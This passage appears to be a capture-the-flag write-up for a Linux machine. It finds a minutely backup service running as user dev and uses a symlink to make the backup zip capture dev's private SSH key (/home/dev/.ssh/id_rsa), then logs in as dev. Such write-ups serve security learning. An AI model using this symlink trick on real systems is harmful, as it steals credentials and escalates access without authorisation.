Skip to main content

Symlinks

After getting a foothold, we are presented with many zip files in the /var/www directory of the www-data user. This is especially odd since there could be some background processes creating these zip files.

Moreover, the zip files are owned by the user dev.

preview home

Services

Surely, something must be creating these zip files. Performing some basic enumeration using linpeas, it seems like there is an interesting service file running...

[email protected]:/etc/systemd/system$ cat website_backup.timer
[Unit]
Description=Regularly backup the website as long as it is still under development

[Timer]
OnCalendar=minutely

[Install]
WantedBy=multi-user.target

[email protected]:/etc/systemd/system$ cat website_backup.service
[Unit]
Description=Backup and rotate website

[Service]
User=dev
Group=www-data
ExecStart=/usr/bin/webbackup

[Install]
WantedBy=multi-user.target

Looking into what is exactly being ran:

/usr/bin/webbackup
#!/bin/bash
set -euf -o pipefail

cd /var/www/

SRC=/var/www/html
DST="/var/www/$(date +%Y-%m-%d_%H-%M-%S)-html.zip"

/usr/bin/rm --force -- "$DST"
/usr/bin/zip --recurse-paths "$DST" "$SRC"

KEEP=10
/usr/bin/find /var/www/ -maxdepth 1 -name '*.zip' -print0 \
| sort --zero-terminated --numeric-sort --reverse \
| while IFS= read -r -d '' backup; do
if [ "$KEEP" -le 0 ]; then
/usr/bin/rm --force -- "$backup"
fi
KEEP="$((KEEP-1))"
done

User.txt

A backup service by zipping. A well known technique is to simply create a file symlinking to another file which www-data does not have access but the service (running as dev) does. Eventually, in the zip file, the original symlink file will be replaced with the actual data it was previously pointing at, allowing for arbitrary file reading.

> ln -s /home/dev/.ssh/id_rsa /var/www/html/assets/img/id

Waiting for the next backup the next minute, we can unzip the package and extract the id_rsa. Using it, we can login as dev and obtain user.txt.

User.txt